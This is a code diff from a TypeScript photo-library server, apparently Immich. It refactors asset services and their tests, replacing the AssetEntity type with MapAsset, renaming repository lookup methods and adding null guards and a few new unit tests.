@ -444,7 +440,7 @@ export class AssetMediaService extends BaseService {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
private async findOrFail(id: string): Promise<AssetEntity> {
|
private async findOrFail(id: string) {
|
||||||
const asset = await this.assetRepository.getById(id, { files: true });
|
const asset = await this.assetRepository.getById(id, { files: true });
|
||||||
if (!asset) {
|
if (!asset) {
|
||||||
throw new NotFoundException('Asset not found');
|
throw new NotFoundException('Asset not found');
|
||||||
|
@ -1,8 +1,7 @@
|
|||||||
import { BadRequestException } from '@nestjs/common';
|
import { BadRequestException } from '@nestjs/common';
|
||||||
import { DateTime } from 'luxon';
|
import { DateTime } from 'luxon';
|
||||||
import { mapAsset } from 'src/dtos/asset-response.dto';
|
import { MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetJobName, AssetStatsResponseDto } from 'src/dtos/asset.dto';
|
import { AssetJobName, AssetStatsResponseDto } from 'src/dtos/asset.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { AssetStatus, AssetType, JobName, JobStatus } from 'src/enum';
|
import { AssetStatus, AssetType, JobName, JobStatus } from 'src/enum';
|
||||||
import { AssetStats } from 'src/repositories/asset.repository';
|
import { AssetStats } from 'src/repositories/asset.repository';
|
||||||
import { AssetService } from 'src/services/asset.service';
|
import { AssetService } from 'src/services/asset.service';
|
||||||
@ -35,7 +34,7 @@ describe(AssetService.name, () => {
|
|||||||
expect(sut).toBeDefined();
|
expect(sut).toBeDefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
const mockGetById = (assets: AssetEntity[]) => {
|
const mockGetById = (assets: MapAsset[]) => {
|
||||||
mocks.asset.getById.mockImplementation((assetId) => Promise.resolve(assets.find((asset) => asset.id === assetId)));
|
mocks.asset.getById.mockImplementation((assetId) => Promise.resolve(assets.find((asset) => asset.id === assetId)));
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -608,7 +607,7 @@ describe(AssetService.name, () => {
|
|||||||
mocks.asset.getById.mockResolvedValue({
|
mocks.asset.getById.mockResolvedValue({
|
||||||
...assetStub.primaryImage,
|
...assetStub.primaryImage,
|
||||||
stack: { ...assetStub.primaryImage.stack, assets: assetStub.primaryImage.stack!.assets.slice(0, 2) },
|
stack: { ...assetStub.primaryImage.stack, assets: assetStub.primaryImage.stack!.assets.slice(0, 2) },
|
||||||
} as AssetEntity);
|
});
|
||||||
|
|
||||||
await sut.handleAssetDeletion({ id: assetStub.primaryImage.id, deleteOnDisk: true });
|
await sut.handleAssetDeletion({ id: assetStub.primaryImage.id, deleteOnDisk: true });
|
||||||
|
|
||||||
|
@ -5,6 +5,7 @@ import { JOBS_ASSET_PAGINATION_SIZE } from 'src/constants';
|
|||||||
import { OnJob } from 'src/decorators';
|
import { OnJob } from 'src/decorators';
|
||||||
import {
|
import {
|
||||||
AssetResponseDto,
|
AssetResponseDto,
|
||||||
|
MapAsset,
|
||||||
MemoryLaneResponseDto,
|
MemoryLaneResponseDto,
|
||||||
SanitizedAssetResponseDto,
|
SanitizedAssetResponseDto,
|
||||||
mapAsset,
|
mapAsset,
|
||||||
@ -20,7 +21,6 @@ import {
|
|||||||
} from 'src/dtos/asset.dto';
|
} from 'src/dtos/asset.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { MemoryLaneDto } from 'src/dtos/search.dto';
|
import { MemoryLaneDto } from 'src/dtos/search.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { AssetStatus, JobName, JobStatus, Permission, QueueName } from 'src/enum';
|
import { AssetStatus, JobName, JobStatus, Permission, QueueName } from 'src/enum';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
import { ISidecarWriteJob, JobItem, JobOf } from 'src/types';
|
import { ISidecarWriteJob, JobItem, JobOf } from 'src/types';
|
||||||
@ -43,7 +43,7 @@ export class AssetService extends BaseService {
|
|||||||
yearsAgo,
|
yearsAgo,
|
||||||
// TODO move this to clients
|
// TODO move this to clients
|
||||||
title: `${yearsAgo} year${yearsAgo > 1 ? 's' : ''} ago`,
|
title: `${yearsAgo} year${yearsAgo > 1 ? 's' : ''} ago`,
|
||||||
assets: assets.map((asset) => mapAsset(asset as unknown as AssetEntity, { auth })),
|
assets: assets.map((asset) => mapAsset(asset, { auth })),
|
||||||
};
|
};
|
||||||
});
|
});
|
||||||
}
|
}
|
||||||
@ -105,7 +105,7 @@ export class AssetService extends BaseService {
|
|||||||
const { description, dateTimeOriginal, latitude, longitude, rating, ...rest } = dto;
|
const { description, dateTimeOriginal, latitude, longitude, rating, ...rest } = dto;
|
||||||
const repos = { asset: this.assetRepository, event: this.eventRepository };
|
const repos = { asset: this.assetRepository, event: this.eventRepository };
|
||||||
|
|
||||||
let previousMotion: AssetEntity | null = null;
|
let previousMotion: MapAsset | null = null;
|
||||||
if (rest.livePhotoVideoId) {
|
if (rest.livePhotoVideoId) {
|
||||||
await onBeforeLink(repos, { userId: auth.user.id, livePhotoVideoId: rest.livePhotoVideoId });
|
await onBeforeLink(repos, { userId: auth.user.id, livePhotoVideoId: rest.livePhotoVideoId });
|
||||||
} else if (rest.livePhotoVideoId === null) {
|
} else if (rest.livePhotoVideoId === null) {
|
||||||
@ -233,7 +233,7 @@ export class AssetService extends BaseService {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
const { fullsizeFile, previewFile, thumbnailFile } = getAssetFiles(asset.files);
|
const { fullsizeFile, previewFile, thumbnailFile } = getAssetFiles(asset.files ?? []);
|
||||||
const files = [thumbnailFile?.path, previewFile?.path, fullsizeFile?.path, asset.encodedVideoPath];
|
const files = [thumbnailFile?.path, previewFile?.path, fullsizeFile?.path, asset.encodedVideoPath];
|
||||||
|
|
||||||
if (deleteOnDisk) {
|
if (deleteOnDisk) {
|
||||||
|
@ -68,7 +68,7 @@ export class DuplicateService extends BaseService {
|
|||||||
return JobStatus.SKIPPED;
|
return JobStatus.SKIPPED;
|
||||||
}
|
}
|
||||||
|
|
||||||
const previewFile = getAssetFile(asset.files, AssetFileType.PREVIEW);
|
const previewFile = getAssetFile(asset.files || [], AssetFileType.PREVIEW);
|
||||||
if (!previewFile) {
|
if (!previewFile) {
|
||||||
this.logger.warn(`Asset ${id} is missing preview image`);
|
this.logger.warn(`Asset ${id} is missing preview image`);
|
||||||
return JobStatus.FAILED;
|
return JobStatus.FAILED;
|
||||||
|
@ -285,9 +285,9 @@ describe(JobService.name, () => {
|
|||||||
it(`should queue ${jobs.length} jobs when a ${item.name} job finishes successfully`, async () => {
|
it(`should queue ${jobs.length} jobs when a ${item.name} job finishes successfully`, async () => {
|
||||||
if (item.name === JobName.GENERATE_THUMBNAILS && item.data.source === 'upload') {
|
if (item.name === JobName.GENERATE_THUMBNAILS && item.data.source === 'upload') {
|
||||||
if (item.data.id === 'asset-live-image') {
|
if (item.data.id === 'asset-live-image') {
|
||||||
mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.livePhotoStillAsset]);
|
mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.livePhotoStillAsset as any]);
|
||||||
} else {
|
} else {
|
||||||
mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.livePhotoMotionAsset]);
|
mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.livePhotoMotionAsset as any]);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -254,7 +254,7 @@ export class JobService extends BaseService {
|
|||||||
|
|
||||||
case JobName.METADATA_EXTRACTION: {
|
case JobName.METADATA_EXTRACTION: {
|
||||||
if (item.data.source === 'sidecar-write') {
|
if (item.data.source === 'sidecar-write') {
|
||||||
const [asset] = await this.assetRepository.getByIdsWithAllRelations([item.data.id]);
|
const [asset] = await this.assetRepository.getByIdsWithAllRelationsButStacks([item.data.id]);
|
||||||
if (asset) {
|
if (asset) {
|
||||||
this.eventRepository.clientSend('on_asset_update', asset.ownerId, mapAsset(asset));
|
this.eventRepository.clientSend('on_asset_update', asset.ownerId, mapAsset(asset));
|
||||||
}
|
}
|
||||||
@ -284,7 +284,7 @@ export class JobService extends BaseService {
|
|||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
|
|
||||||
const [asset] = await this.assetRepository.getByIdsWithAllRelations([item.data.id]);
|
const [asset] = await this.assetRepository.getByIdsWithAllRelationsButStacks([item.data.id]);
|
||||||
if (!asset) {
|
if (!asset) {
|
||||||
this.logger.warn(`Could not find asset ${item.data.id} after generating thumbnails`);
|
this.logger.warn(`Could not find asset ${item.data.id} after generating thumbnails`);
|
||||||
break;
|
break;
|
||||||
|
@ -350,7 +350,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('ENOENT, no such file or directory'));
|
mocks.storage.stat.mockRejectedValue(new Error('ENOENT, no such file or directory'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -371,7 +371,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -392,7 +392,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
mocks.storage.stat.mockRejectedValue(new Error('Could not read file'));
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -410,7 +410,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -431,7 +431,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -451,7 +451,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -471,7 +471,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.external.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -489,7 +489,7 @@ describe(LibraryService.name, () => {
|
|||||||
progressCounter: 0,
|
progressCounter: 0,
|
||||||
};
|
};
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.trashedOffline]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.trashedOffline]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.trashedOffline.fileModifiedAt } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime: assetStub.trashedOffline.fileModifiedAt } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
@ -518,7 +518,7 @@ describe(LibraryService.name, () => {
|
|||||||
|
|
||||||
const mtime = new Date(assetStub.external.fileModifiedAt.getDate() + 1);
|
const mtime = new Date(assetStub.external.fileModifiedAt.getDate() + 1);
|
||||||
|
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.external]);
|
mocks.assetJob.getForSyncAssets.mockResolvedValue([assetStub.external]);
|
||||||
mocks.storage.stat.mockResolvedValue({ mtime } as Stats);
|
mocks.storage.stat.mockResolvedValue({ mtime } as Stats);
|
||||||
|
|
||||||
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
await expect(sut.handleSyncAssets(mockAssetJob)).resolves.toBe(JobStatus.SUCCESS);
|
||||||
|
@ -18,7 +18,6 @@ import {
|
|||||||
ValidateLibraryImportPathResponseDto,
|
ValidateLibraryImportPathResponseDto,
|
||||||
ValidateLibraryResponseDto,
|
ValidateLibraryResponseDto,
|
||||||
} from 'src/dtos/library.dto';
|
} from 'src/dtos/library.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { AssetStatus, AssetType, DatabaseLock, ImmichWorker, JobName, JobStatus, QueueName } from 'src/enum';
|
import { AssetStatus, AssetType, DatabaseLock, ImmichWorker, JobName, JobStatus, QueueName } from 'src/enum';
|
||||||
import { ArgOf } from 'src/repositories/event.repository';
|
import { ArgOf } from 'src/repositories/event.repository';
|
||||||
import { AssetSyncResult } from 'src/repositories/library.repository';
|
import { AssetSyncResult } from 'src/repositories/library.repository';
|
||||||
@ -467,7 +466,7 @@ export class LibraryService extends BaseService {
|
|||||||
|
|
||||||
@OnJob({ name: JobName.LIBRARY_SYNC_ASSETS, queue: QueueName.LIBRARY })
|
@OnJob({ name: JobName.LIBRARY_SYNC_ASSETS, queue: QueueName.LIBRARY })
|
||||||
async handleSyncAssets(job: JobOf<JobName.LIBRARY_SYNC_ASSETS>): Promise<JobStatus> {
|
async handleSyncAssets(job: JobOf<JobName.LIBRARY_SYNC_ASSETS>): Promise<JobStatus> {
|
||||||
const assets = await this.assetRepository.getByIds(job.assetIds);
|
const assets = await this.assetJobRepository.getForSyncAssets(job.assetIds);
|
||||||
|
|
||||||
const assetIdsToOffline: string[] = [];
|
const assetIdsToOffline: string[] = [];
|
||||||
const trashedAssetIdsToOffline: string[] = [];
|
const trashedAssetIdsToOffline: string[] = [];
|
||||||
@ -561,7 +560,16 @@ export class LibraryService extends BaseService {
|
|||||||
return JobStatus.SUCCESS;
|
return JobStatus.SUCCESS;
|
||||||
}
|
}
|
||||||
|
|
||||||
private checkExistingAsset(asset: AssetEntity, stat: Stats | null): AssetSyncResult {
|
private checkExistingAsset(
|
||||||
|
asset: {
|
||||||
|
isOffline: boolean;
|
||||||
|
libraryId: string | null;
|
||||||
|
originalPath: string;
|
||||||
|
status: AssetStatus;
|
||||||
|
fileModifiedAt: Date;
|
||||||
|
},
|
||||||
|
stat: Stats | null,
|
||||||
|
): AssetSyncResult {
|
||||||
if (!stat) {
|
if (!stat) {
|
||||||
// File not found on disk or permission error
|
// File not found on disk or permission error
|
||||||
if (asset.isOffline) {
|
if (asset.isOffline) {
|
||||||
|
@ -15,6 +15,14 @@ describe(MemoryService.name, () => {
|
|||||||
expect(sut).toBeDefined();
|
expect(sut).toBeDefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('onMemoryCleanup', () => {
|
||||||
|
it('should clean up memories', async () => {
|
||||||
|
mocks.memory.cleanup.mockResolvedValue([]);
|
||||||
|
await sut.onMemoriesCleanup();
|
||||||
|
expect(mocks.memory.cleanup).toHaveBeenCalled();
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
describe('search', () => {
|
describe('search', () => {
|
||||||
it('should search memories', async () => {
|
it('should search memories', async () => {
|
||||||
const [userId] = newUuids();
|
const [userId] = newUuids();
|
||||||
|
@ -3,7 +3,7 @@ import { randomBytes } from 'node:crypto';
|
|||||||
import { Stats } from 'node:fs';
|
import { Stats } from 'node:fs';
|
||||||
import { constants } from 'node:fs/promises';
|
import { constants } from 'node:fs/promises';
|
||||||
import { defaults } from 'src/config';
|
import { defaults } from 'src/config';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
import { MapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AssetType, ExifOrientation, ImmichWorker, JobName, JobStatus, SourceType } from 'src/enum';
|
import { AssetType, ExifOrientation, ImmichWorker, JobName, JobStatus, SourceType } from 'src/enum';
|
||||||
import { WithoutProperty } from 'src/repositories/asset.repository';
|
import { WithoutProperty } from 'src/repositories/asset.repository';
|
||||||
import { ImmichTags } from 'src/repositories/metadata.repository';
|
import { ImmichTags } from 'src/repositories/metadata.repository';
|
||||||
@ -549,7 +549,6 @@ describe(MetadataService.name, () => {
|
|||||||
livePhotoVideoId: null,
|
livePhotoVideoId: null,
|
||||||
libraryId: null,
|
libraryId: null,
|
||||||
});
|
});
|
||||||
mocks.asset.getByIds.mockResolvedValue([{ ...assetStub.livePhotoWithOriginalFileName, livePhotoVideoId: null }]);
|
|
||||||
mocks.storage.stat.mockResolvedValue({
|
mocks.storage.stat.mockResolvedValue({
|
||||||
size: 123_456,
|
size: 123_456,
|
||||||
mtime: assetStub.livePhotoWithOriginalFileName.fileModifiedAt,
|
mtime: assetStub.livePhotoWithOriginalFileName.fileModifiedAt,
|
||||||
@ -719,7 +718,7 @@ describe(MetadataService.name, () => {
|
|||||||
});
|
});
|
||||||
mocks.crypto.hashSha1.mockReturnValue(randomBytes(512));
|
mocks.crypto.hashSha1.mockReturnValue(randomBytes(512));
|
||||||
mocks.asset.create.mockImplementation(
|
mocks.asset.create.mockImplementation(
|
||||||
(asset) => Promise.resolve({ ...assetStub.livePhotoMotionAsset, ...asset }) as Promise<AssetEntity>,
|
(asset) => Promise.resolve({ ...assetStub.livePhotoMotionAsset, ...asset }) as Promise<MapAsset>,
|
||||||
);
|
);
|
||||||
const video = randomBytes(512);
|
const video = randomBytes(512);
|
||||||
mocks.storage.readFile.mockResolvedValue(video);
|
mocks.storage.readFile.mockResolvedValue(video);
|
||||||
@ -1394,7 +1393,7 @@ describe(MetadataService.name, () => {
|
|||||||
});
|
});
|
||||||
|
|
||||||
it('should set sidecar path if exists (sidecar named photo.xmp)', async () => {
|
it('should set sidecar path if exists (sidecar named photo.xmp)', async () => {
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.sidecarWithoutExt]);
|
mocks.asset.getByIds.mockResolvedValue([assetStub.sidecarWithoutExt as any]);
|
||||||
mocks.storage.checkFileExists.mockResolvedValueOnce(false);
|
mocks.storage.checkFileExists.mockResolvedValueOnce(false);
|
||||||
mocks.storage.checkFileExists.mockResolvedValueOnce(true);
|
mocks.storage.checkFileExists.mockResolvedValueOnce(true);
|
||||||
|
|
||||||
@ -1446,7 +1445,7 @@ describe(MetadataService.name, () => {
|
|||||||
|
|
||||||
describe('handleSidecarDiscovery', () => {
|
describe('handleSidecarDiscovery', () => {
|
||||||
it('should skip hidden assets', async () => {
|
it('should skip hidden assets', async () => {
|
||||||
mocks.asset.getByIds.mockResolvedValue([assetStub.livePhotoMotionAsset]);
|
mocks.asset.getByIds.mockResolvedValue([assetStub.livePhotoMotionAsset as any]);
|
||||||
await sut.handleSidecarDiscovery({ id: assetStub.livePhotoMotionAsset.id });
|
await sut.handleSidecarDiscovery({ id: assetStub.livePhotoMotionAsset.id });
|
||||||
expect(mocks.storage.checkFileExists).not.toHaveBeenCalled();
|
expect(mocks.storage.checkFileExists).not.toHaveBeenCalled();
|
||||||
});
|
});
|
||||||
|
@ -271,7 +271,7 @@ export class MetadataService extends BaseService {
|
|||||||
];
|
];
|
||||||
|
|
||||||
if (this.isMotionPhoto(asset, exifTags)) {
|
if (this.isMotionPhoto(asset, exifTags)) {
|
||||||
promises.push(this.applyMotionPhotos(asset as unknown as Asset, exifTags, dates, stats));
|
promises.push(this.applyMotionPhotos(asset, exifTags, dates, stats));
|
||||||
}
|
}
|
||||||
|
|
||||||
if (isFaceImportEnabled(metadata) && this.hasTaggedFaces(exifTags)) {
|
if (isFaceImportEnabled(metadata) && this.hasTaggedFaces(exifTags)) {
|
||||||
|
@ -2,7 +2,8 @@ import { BadRequestException, Injectable, NotFoundException } from '@nestjs/comm
|
|||||||
import { Insertable, Updateable } from 'kysely';
|
import { Insertable, Updateable } from 'kysely';
|
||||||
import { FACE_THUMBNAIL_SIZE, JOBS_ASSET_PAGINATION_SIZE } from 'src/constants';
|
import { FACE_THUMBNAIL_SIZE, JOBS_ASSET_PAGINATION_SIZE } from 'src/constants';
|
||||||
import { StorageCore } from 'src/cores/storage.core';
|
import { StorageCore } from 'src/cores/storage.core';
|
||||||
import { AssetFaces, FaceSearch, Person } from 'src/db';
|
import { Person } from 'src/database';
|
||||||
|
import { AssetFaces, FaceSearch } from 'src/db';
|
||||||
import { Chunked, OnJob } from 'src/decorators';
|
import { Chunked, OnJob } from 'src/decorators';
|
||||||
import { BulkIdErrorReason, BulkIdResponseDto } from 'src/dtos/asset-ids.response.dto';
|
import { BulkIdErrorReason, BulkIdResponseDto } from 'src/dtos/asset-ids.response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
@ -315,6 +316,7 @@ export class PersonService extends BaseService {
|
|||||||
const facesToAdd: (Insertable<AssetFaces> & { id: string })[] = [];
|
const facesToAdd: (Insertable<AssetFaces> & { id: string })[] = [];
|
||||||
const embeddings: FaceSearch[] = [];
|
const embeddings: FaceSearch[] = [];
|
||||||
const mlFaceIds = new Set<string>();
|
const mlFaceIds = new Set<string>();
|
||||||
|
|
||||||
for (const face of asset.faces) {
|
for (const face of asset.faces) {
|
||||||
if (face.sourceType === SourceType.MACHINE_LEARNING) {
|
if (face.sourceType === SourceType.MACHINE_LEARNING) {
|
||||||
mlFaceIds.add(face.id);
|
mlFaceIds.add(face.id);
|
||||||
@ -477,7 +479,7 @@ export class PersonService extends BaseService {
|
|||||||
embedding: face.faceSearch.embedding,
|
embedding: face.faceSearch.embedding,
|
||||||
maxDistance: machineLearning.facialRecognition.maxDistance,
|
maxDistance: machineLearning.facialRecognition.maxDistance,
|
||||||
numResults: machineLearning.facialRecognition.minFaces,
|
numResults: machineLearning.facialRecognition.minFaces,
|
||||||
minBirthDate: face.asset.fileCreatedAt,
|
minBirthDate: face.asset.fileCreatedAt ?? undefined,
|
||||||
});
|
});
|
||||||
|
|
||||||
// `matches` also includes the face itself
|
// `matches` also includes the face itself
|
||||||
@ -503,7 +505,7 @@ export class PersonService extends BaseService {
|
|||||||
maxDistance: machineLearning.facialRecognition.maxDistance,
|
maxDistance: machineLearning.facialRecognition.maxDistance,
|
||||||
numResults: 1,
|
numResults: 1,
|
||||||
hasPerson: true,
|
hasPerson: true,
|
||||||
minBirthDate: face.asset.fileCreatedAt,
|
minBirthDate: face.asset.fileCreatedAt ?? undefined,
|
||||||
});
|
});
|
||||||
|
|
||||||
if (matchWithPerson.length > 0) {
|
if (matchWithPerson.length > 0) {
|
||||||
|
@ -39,13 +39,36 @@ describe(SearchService.name, () => {
|
|||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
|
describe('searchPlaces', () => {
|
||||||
|
it('should search places', async () => {
|
||||||
|
mocks.search.searchPlaces.mockResolvedValue([
|
||||||
|
{
|
||||||
|
id: 42,
|
||||||
|
name: 'my place',
|
||||||
|
latitude: 420,
|
||||||
|
longitude: 69,
|
||||||
|
admin1Code: null,
|
||||||
|
admin1Name: null,
|
||||||
|
admin2Code: null,
|
||||||
|
admin2Name: null,
|
||||||
|
alternateNames: null,
|
||||||
|
countryCode: 'US',
|
||||||
|
modificationDate: new Date(),
|
||||||
|
},
|
||||||
|
]);
|
||||||
|
|
||||||
|
await sut.searchPlaces({ name: 'place' });
|
||||||
|
expect(mocks.search.searchPlaces).toHaveBeenCalledWith('place');
|
||||||
|
});
|
||||||
|
});
|
||||||
|
|
||||||
describe('getExploreData', () => {
|
describe('getExploreData', () => {
|
||||||
it('should get assets by city and tag', async () => {
|
it('should get assets by city and tag', async () => {
|
||||||
mocks.asset.getAssetIdByCity.mockResolvedValue({
|
mocks.asset.getAssetIdByCity.mockResolvedValue({
|
||||||
fieldName: 'exifInfo.city',
|
fieldName: 'exifInfo.city',
|
||||||
items: [{ value: 'test-city', data: assetStub.withLocation.id }],
|
items: [{ value: 'test-city', data: assetStub.withLocation.id }],
|
||||||
});
|
});
|
||||||
mocks.asset.getByIdsWithAllRelations.mockResolvedValue([assetStub.withLocation]);
|
mocks.asset.getByIdsWithAllRelationsButStacks.mockResolvedValue([assetStub.withLocation]);
|
||||||
const expectedResponse = [
|
const expectedResponse = [
|
||||||
{ fieldName: 'exifInfo.city', items: [{ value: 'test-city', data: mapAsset(assetStub.withLocation) }] },
|
{ fieldName: 'exifInfo.city', items: [{ value: 'test-city', data: mapAsset(assetStub.withLocation) }] },
|
||||||
];
|
];
|
||||||
|
@ -1,5 +1,5 @@
|
|||||||
import { BadRequestException, Injectable } from '@nestjs/common';
|
import { BadRequestException, Injectable } from '@nestjs/common';
|
||||||
import { AssetMapOptions, AssetResponseDto, mapAsset } from 'src/dtos/asset-response.dto';
|
import { AssetMapOptions, AssetResponseDto, MapAsset, mapAsset } from 'src/dtos/asset-response.dto';
|
||||||
import { AuthDto } from 'src/dtos/auth.dto';
|
import { AuthDto } from 'src/dtos/auth.dto';
|
||||||
import { mapPerson, PersonResponseDto } from 'src/dtos/person.dto';
|
import { mapPerson, PersonResponseDto } from 'src/dtos/person.dto';
|
||||||
import {
|
import {
|
||||||
@ -14,7 +14,6 @@ import {
|
|||||||
SearchSuggestionType,
|
SearchSuggestionType,
|
||||||
SmartSearchDto,
|
SmartSearchDto,
|
||||||
} from 'src/dtos/search.dto';
|
} from 'src/dtos/search.dto';
|
||||||
import { AssetEntity } from 'src/entities/asset.entity';
|
|
||||||
import { AssetOrder } from 'src/enum';
|
import { AssetOrder } from 'src/enum';
|
||||||
import { SearchExploreItem } from 'src/repositories/search.repository';
|
import { SearchExploreItem } from 'src/repositories/search.repository';
|
||||||
import { BaseService } from 'src/services/base.service';
|
import { BaseService } from 'src/services/base.service';
|
||||||
@ -36,7 +35,7 @@ export class SearchService extends BaseService {
|
|||||||
async getExploreData(auth: AuthDto): Promise<SearchExploreItem<AssetResponseDto>[]> {
|
async getExploreData(auth: AuthDto): Promise<SearchExploreItem<AssetResponseDto>[]> {
|
||||||
const options = { maxFields: 12, minAssetsPerField: 5 };
|
const options = { maxFields: 12, minAssetsPerField: 5 };
|
||||||
const cities = await this.assetRepository.getAssetIdByCity(auth.user.id, options);
|
const cities = await this.assetRepository.getAssetIdByCity(auth.user.id, options);
|
||||||
const assets = await this.assetRepository.getByIdsWithAllRelations(cities.items.map(({ data }) => data));
|
const assets = await this.assetRepository.getByIdsWithAllRelationsButStacks(cities.items.map(({ data }) => data));
|
||||||
const items = assets.map((asset) => ({ value: asset.exifInfo!.city!, data: mapAsset(asset, { auth }) }));
|
